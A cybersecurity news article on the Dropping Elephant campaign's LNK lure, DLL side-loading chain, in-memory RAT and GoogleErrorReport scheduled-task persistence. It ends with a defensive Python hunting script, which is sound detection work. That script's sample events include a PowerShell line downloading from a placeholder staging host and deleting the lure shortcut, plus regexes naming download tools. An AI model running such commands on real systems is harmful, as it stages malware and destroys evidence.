Hackers Use GoogleErrorReport Scheduled Task for Persistence in Dropping Elephant Campaign


What happened

The threat actor known as Dropping Elephant has returned with a refined campaign that uses a China-themed lure document to deliver a reworked remote access trojan onto victim machines.

The campaign begins with a malicious Windows shortcut file named GRES3001.lnk. The file is disguised as a PDF related to an industrial energy contract. When opened, it launches a PowerShell script that downloads additional malware from a staging server while showing the victim a decoy document about a GRES-3 seawater pump contract.

Researchers from Rapid7 identified overlaps with earlier Dropping Elephant activity, including delivery patterns, screenshot logic, beaconing behavior, and command-handler structure.

The downloaded files include a legitimate Microsoft binary, Fondue.exe, which is abused for DLL side-loading: when run from the staging folder it picks up a malicious loader planted beside it under the name APPWIZ.cpl instead of the genuine system library. That loader decrypts an encrypted file named editor.dat and hands the result to a Donut shellcode loader.

The final RAT exists on disk only in encrypted form (editor.dat) and is mapped into memory once decrypted; no decrypted copy is ever written to disk. This memory-resident approach defeats detection that relies on scanning files.

Once active, the RAT fingerprints the victim machine and connects to a command-and-control server over HTTPS on TCP port 443, so its beacon blends with ordinary web traffic. It checks in every 10 seconds and can run commands, list files, capture screenshots, upload files, and download additional tools.

For persistence, the PowerShell script stages files in the C:\Users\Public folder and creates a scheduled task named GoogleErrorReport. The task is configured to run Fondue.exe every minute, repeatedly triggering the DLL side-loading chain that loads the RAT into memory.

The scheduled task name appears designed to blend in with normal system activity. After creating the task, the script deletes the original shortcut file, removing the most visible trace of the initial infection.

The RAT also includes advanced evasion and anti-analysis capabilities. It uses control-flow flattening, checks for debugger and sandbox-related processes, resolves API functions at runtime, and patches AMSI, WLDP, and ETW in its own process before executing its payload, blinding script scanning, dynamic-code trust checks, and event tracing for that process. These patches are local to the malware's process, not system-wide, so telemetry from other processes and from the kernel is unaffected.

Before connecting to its command-and-control server, the malware checks internet connectivity and collects the host’s public IP address and country. Its communications are encrypted with Salsa20 and wrapped in Base64 encoding.

Who is affected

Organizations in Dropping Elephant's target set are affected, in practice any user who receives and opens a shortcut file disguised as a business document.

Windows environments are directly exposed because the campaign uses Windows shortcut files, PowerShell, scheduled tasks, DLL side-loading, and Microsoft binaries to execute and persist.

The lure document’s industrial energy contract theme suggests risk for organizations that may receive energy, infrastructure, industrial, or procurement-related documents. However, the attack chain could be adapted for other themes.

Any endpoint where a GoogleErrorReport scheduled task is present, or where any scheduled task runs binaries from public user folders, should be treated as potentially compromised. The task name is trivial for the attacker to change, so hunt on the behaviour (a task repeating every minute that runs an executable from C:\Users\Public) as well as on the name.

Why CISOs should care

This campaign shows how attackers are combining simple social engineering with stealthier execution and persistence techniques. The initial lure is a disguised shortcut file, but the follow-on activity uses DLL side-loading, in-memory execution, scheduled tasks, and security control tampering.

For CISOs, the scheduled task is especially important because it creates a clear behavioral detection opportunity. A task named GoogleErrorReport running every minute from a public user directory should stand out in enterprise telemetry.

The attack also reinforces the need to monitor trusted binaries and native Windows tools. Fondue.exe is a legitimate Microsoft binary, but in this campaign it is abused as part of the DLL side-loading chain. PowerShell and scheduled tasks are also used for execution and persistence.

The RAT’s capabilities make the compromise significant. Command execution, file listing, screenshot capture, file upload, and tool download functions can support espionage, lateral movement, data theft, and broader intrusion activity.

3 practical actions

  1. Hunt for the GoogleErrorReport scheduled task: The campaign creates a scheduled task with this name and uses it to run Fondue.exe every minute. Security teams should search endpoints for this task, especially when it runs binaries from C:\Users\Public or other unusual locations.
  2. Monitor shortcut files spawning PowerShell: The attack begins with a malicious LNK file disguised as a PDF. A double-clicked shortcut is launched by the Windows shell, so in process telemetry it appears as explorer.exe spawning powershell.exe; the .lnk path itself is often absent from the command line. Security teams should alert on that parent-child pair when it is combined with downloading remote content, staging files in public folders, or deleting the original shortcut after execution.
  3. Review endpoint coverage for in-memory payloads and security control tampering: The RAT loads directly into memory and patches controls such as AMSI, WLDP, and ETW. Security teams should ensure endpoint tools can detect suspicious in-memory execution, DLL side-loading, and process tampering behavior rather than relying only on static file indicators.
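The hunt logic behind actions 1 and 2, covering the scheduled-task persistence and the LNK-to-PowerShell stage described under "What happened", as an added example that is not part of the original article or of Rapid7's research. The event shapes and field names are a simplified stand-in for Security event 4698 (scheduled task created) and Sysmon event 1 (process create), the sample command line and task XML are constructed for illustration, and staging.example.invalid is a placeholder host.

```python
# Added example (not from the article or Rapid7): hunt logic for the
# GoogleErrorReport persistence chain, run over constructed sample telemetry.
import re
import xml.etree.ElementTree as ET

# World-writable locations that have no business hosting scheduled-task binaries.
USER_WRITABLE = (r"c:\users\public", r"c:\programdata", r"\appdata\local\temp")
# The task name seen in this campaign, plus a looser pattern for vendor-lookalike names.
KNOWN_TASK_NAMES = {"googleerrorreport"}
LOOKALIKE_RE = re.compile(r"^(google|microsoft|adobe)[a-z]*(update|report|sync)$", re.I)
# Namespace of Task Scheduler XML, which is what the TaskContent field of event 4698 carries.
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
DOWNLOAD_RE = re.compile(r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|start-bitstransfer|\bcurl\b|\bwget\b", re.I)
STAGE_RE = re.compile(r"c:\\users\\public\\", re.I)
LNK_DELETE_RE = re.compile(r"\b(remove-item|del|erase|rm)\b[^;|&]*\.lnk", re.I)


def iso8601_seconds(duration):
    """Parse the PnDTnHnMnS durations Task Scheduler uses for Repetition/Interval."""
    m = re.fullmatch(r"P(?:(\d+)D)?T?(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?", duration)
    if not m:
        raise ValueError(f"not a Task Scheduler duration: {duration!r}")
    days, hours, minutes, seconds = (int(x) if x else 0 for x in m.groups())
    return days * 86400 + hours * 3600 + minutes * 60 + seconds


def check_scheduled_task(event):
    """Return the reasons a task-creation event looks like this persistence chain."""
    reasons = []
    full_name = event["TaskName"]
    short_name = full_name.rsplit("\\", 1)[-1]
    if short_name.lower() in KNOWN_TASK_NAMES:
        reasons.append(f"task name {short_name} matches the campaign")
    elif LOOKALIKE_RE.match(short_name) and not full_name.lower().startswith("\\microsoft\\"):
        reasons.append(f"vendor-lookalike task name {short_name} outside \\Microsoft\\")
    root = ET.fromstring(event["TaskContent"])
    for cmd in root.iterfind(".//t:Exec/t:Command", TASK_NS):
        path = (cmd.text or "").strip().strip('"').lower()
        if any(marker in path for marker in USER_WRITABLE):
            reasons.append(f"action runs from a user-writable path: {path}")
    for interval in root.iterfind(".//t:Repetition/t:Interval", TASK_NS):
        secs = iso8601_seconds(interval.text.strip())
        if secs <= 60:
            reasons.append(f"repeats every {secs}s")
    return reasons


def check_process(event):
    """Return the reasons a process-creation event looks like the LNK -> PowerShell stage."""
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    if image not in ("powershell.exe", "pwsh.exe"):
        return []
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    cmd = event["CommandLine"]
    reasons = []
    if parent == "explorer.exe":
        # A double-clicked .lnk is launched by the shell, so explorer.exe is the parent.
        reasons.append("PowerShell spawned directly by explorer.exe")
    if DOWNLOAD_RE.search(cmd):
        reasons.append("command line downloads remote content")
    if STAGE_RE.search(cmd):
        reasons.append("command line references C:\\Users\\Public")
    if LNK_DELETE_RE.search(cmd):
        reasons.append("command line deletes a .lnk file")
    # explorer -> powershell on its own is too common to alert on; require a second signal.
    return reasons if len(reasons) >= 2 else []


def hunt(events):
    """Run both checks over a list of events; return (RecordId, reasons) for each hit."""
    hits = []
    for ev in events:
        if ev["EventType"] == "TaskCreated":
            reasons = check_scheduled_task(ev)
        elif ev["EventType"] == "ProcessCreate":
            reasons = check_process(ev)
        else:
            reasons = []
        if reasons:
            hits.append((ev["RecordId"], reasons))
    return hits


# Constructed sample events (not real telemetry); staging.example.invalid is a placeholder.
MALICIOUS_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><TimeTrigger><Repetition><Interval>PT1M</Interval></Repetition><Enabled>true</Enabled></TimeTrigger></Triggers>
  <Actions Context="Author"><Exec><Command>C:\Users\Public\Fondue.exe</Command></Exec></Actions>
</Task>"""
BENIGN_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><ScheduleByWeek><WeeksInterval>1</WeeksInterval></ScheduleByWeek></CalendarTrigger></Triggers>
  <Actions Context="Author"><Exec><Command>%windir%\system32\defrag.exe</Command><Arguments>-c -h -o</Arguments></Exec></Actions>
</Task>"""
SAMPLE_EVENTS = [
    {"RecordId": 1, "EventType": "ProcessCreate",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'powershell.exe -c "iwr https://staging.example.invalid/e -OutFile C:\Users\Public\editor.dat; '
                    r'Remove-Item C:\Users\alice\Downloads\GRES3001.lnk"'},
    {"RecordId": 2, "EventType": "TaskCreated", "TaskName": r"\GoogleErrorReport", "TaskContent": MALICIOUS_TASK_XML},
    {"RecordId": 3, "EventType": "TaskCreated", "TaskName": r"\Microsoft\Windows\Defrag\ScheduledDefrag", "TaskContent": BENIGN_TASK_XML},
    {"RecordId": 4, "EventType": "ProcessCreate",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\inventory.ps1"},
]

if __name__ == "__main__":
    for record_id, reasons in hunt(SAMPLE_EVENTS):
        print(record_id, "; ".join(reasons))
```

Run against the constructed events, records 1 (explorer.exe launching PowerShell that downloads, stages under C:\Users\Public and deletes a .lnk) and 2 (a GoogleErrorReport task repeating every minute from C:\Users\Public) are flagged; the weekly defrag task and the cmd.exe-launched inventory script are not. The task check deliberately scores the action path and the repetition interval independently of the name, so a renamed task still surfaces; feed it the TaskContent XML from your 4698 events or the output of Export-ScheduledTask.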

John Kevin Hao is a news and feature writer covering cybersecurity, technology, and business targeted for professional audiences.